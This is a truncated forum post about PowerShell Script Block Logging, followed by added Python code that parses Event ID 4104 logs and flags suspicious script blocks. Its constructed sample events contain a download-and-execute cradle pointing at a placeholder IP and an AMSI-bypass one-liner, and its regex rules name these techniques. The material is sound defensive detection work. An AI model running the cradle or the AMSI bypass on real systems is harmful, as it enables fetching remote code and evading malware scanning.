Custom Detection Rules for PowerShell (W/ Script Block Logging Enabled). Is it even worth it?
May 21, 2024, 6:46 a.m. | /u/sha3dowX
For [Blue|Purple] Teams in Cyber Defence www.reddit.com
In my work environment, we are considering enabling PowerShell Script Block Logging because EDR tools don't natively capture PowerShell interactive session commands or script contents unless a live investigation is conducted (and they only capture the initial process command line of the PowerShell.exe process that started the session). Since we already ingest Windows event logs, enabling Script Block Logging seems logical to enhance our threat hunting and forensic capabilities.
After enabling it enterprise-wide, I'm thinking of creating custom detection rules based on the …
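The detection side of what the post describes, as an added example that is not the poster's code: a small Python routine that reassembles Script Block Logging events (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) by ScriptBlockId and then runs a handful of pattern rules over the full script text. The sample events are constructed, the IP address is a documentation address, and the rule names are hypothetical; the registry path in the comment is the real policy location for enabling the feature.

```python
import re
from collections import defaultdict

# Script Block Logging is enabled by policy at
#   HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
#   EnableScriptBlockLogging (DWORD) = 1
# and then writes Event ID 4104 to Microsoft-Windows-PowerShell/Operational.
# Long script blocks are split over several 4104 events that share a
# ScriptBlockId and carry MessageNumber / MessageTotal.

# Constructed sample events (not real telemetry), already parsed from the
# event XML into the fields a SIEM would expose. Note b2 arrives out of order.
SAMPLE_4104 = [
    {"ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Temp | Measure-Object"},
    {"ScriptBlockId": "b2", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "Invoke-Expression $code"},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "$code = (New-Object Net.WebClient)"
                        ".DownloadString('http://198.51.100.7/p.ps1');"},
    {"ScriptBlockId": "c3", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "[Ref].Assembly.GetType('System.Management.Automation"
                        ".AmsiUtils').GetField('amsiInitFailed',"
                        "'NonPublic,Static').SetValue($null,$true)"},
]

# Hypothetical rule set: name -> regex over the reassembled script text.
RULES = {
    "download_cradle": re.compile(
        r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)", re.I),
    "invoke_expression": re.compile(r"\b(Invoke-Expression|iex)\b", re.I),
    "base64_decode": re.compile(r"FromBase64String|-enc(odedcommand)?\b", re.I),
    "amsi_tamper": re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I),
}


def reassemble(events):
    """Join 4104 fragments per ScriptBlockId in MessageNumber order.

    Matching each fragment on its own misses patterns that straddle a
    fragment boundary and also loses the relationship between a download
    cradle in one fragment and the Invoke-Expression in the next.
    """
    parts = defaultdict(dict)
    for ev in events:
        parts[ev["ScriptBlockId"]][ev["MessageNumber"]] = ev["ScriptBlockText"]
    return {sbid: "".join(frags[n] for n in sorted(frags))
            for sbid, frags in parts.items()}


def detect(events):
    """Return {ScriptBlockId: [matched rule names]} for blocks that hit a rule."""
    hits = {}
    for sbid, text in reassemble(events).items():
        matched = [name for name, rx in RULES.items() if rx.search(text)]
        if matched:
            hits[sbid] = matched
    return hits


if __name__ == "__main__":
    for sbid, rules in detect(SAMPLE_4104).items():
        print(f"{sbid}: {', '.join(rules)}")
```

Two practitioner caveats worth keeping in mind when writing such rules: 4104 records the script block as PowerShell compiles it, so a string that is only decoded or concatenated at runtime shows up in a later 4104 event for the inner block rather than in the outer one, which is why reassembly and per-block matching are both needed; and PowerShell 5+ already writes Warning-level 4104 events for script blocks it considers suspicious even with the policy off, so some of these hits may be visible before the enterprise-wide rollout.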